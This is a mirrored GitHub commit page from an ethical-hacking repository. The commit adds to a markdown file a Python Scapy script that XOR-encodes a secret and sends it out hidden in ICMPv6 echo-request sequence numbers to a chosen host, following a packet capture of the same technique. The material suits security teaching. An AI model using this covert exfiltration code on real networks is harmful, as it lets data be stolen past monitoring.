Mirrors/h4cker
2
0
Fork 0
mirror of https://github.com/The-Art-of-Hacking/h4cker synced 2024-11-22 02:43:02 +00:00
Code Issues Projects Releases Packages Wiki Activity

Update exfil-scapy.md

Browse source
This commit is contained in:
Omar Santos 2021-05-13 09:54:21 -04:00 committed by GitHub
parent 0716f47c6e
commit 67544a167f
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 35 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

35
python_ruby_and_bash/exfil-scapy.md
View file

@ -19,3 +19,38 @@ listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
0x0010: 0000 0000 0000 01ce XXXX XXXX XXXX 1662 ...............b 0x0010: 0000 0000 0000 01ce XXXX XXXX XXXX 1662 ...............b
0x0020: 7a8a 20ff fe43 93d4 7465 7374 0000 z....C..sensitive_info.. 0x0020: 7a8a 20ff fe43 93d4 7465 7374 0000 z....C..sensitive_info..
``` ```
Another example:
```
from scapy.all import IPv6,ICMPv6EchoRequest,send
import sys
secret = "THISISASECRET" # hidden info stored in the packet
endpoint = sys.argv[1] # addr where are we sending the data
# taken from a random ping6 packet
# 0x0030: 1e38 2c5f 0000 0000 4434 0100 0000 0000 .8,_....D4......
# 0x0040: 1011 1213 1415 1617 1819 1a1b 1c1d 1e1f ................
# 0x0050: 2021 2223 2425 2627 2829 2a2b 2c2d 2e2f .!"#$%&'()*+,-./
# 0x0060: 3031 3233 3435 3637 01234567
data = "\x1e\x38\x2c\x5f\x00\x00\x00\x00\x44\x34\x01\x00\x00\x00\x00\x00" \
"\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" \
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f" \
"\x30\x31\x32\x33\x34\x35\x36\x37"
def sendpkt(d):
if len(d) == 2:
seq = (ord(d[0])<<8) + ord(d[1])
else:
seq = ord(d)
send(IPv6(dst=endpoint)/ICMPv6EchoRequest(id=0x1337,seq=seq, data=data))
# encrypt data with key 0x17
xor = lambda x: ''.join([ chr(ord(c)^0x17) for c in x])
i=0
for b in range(0, len(secret), 2):
sendpkt(xor(secret[b:b+2]))
```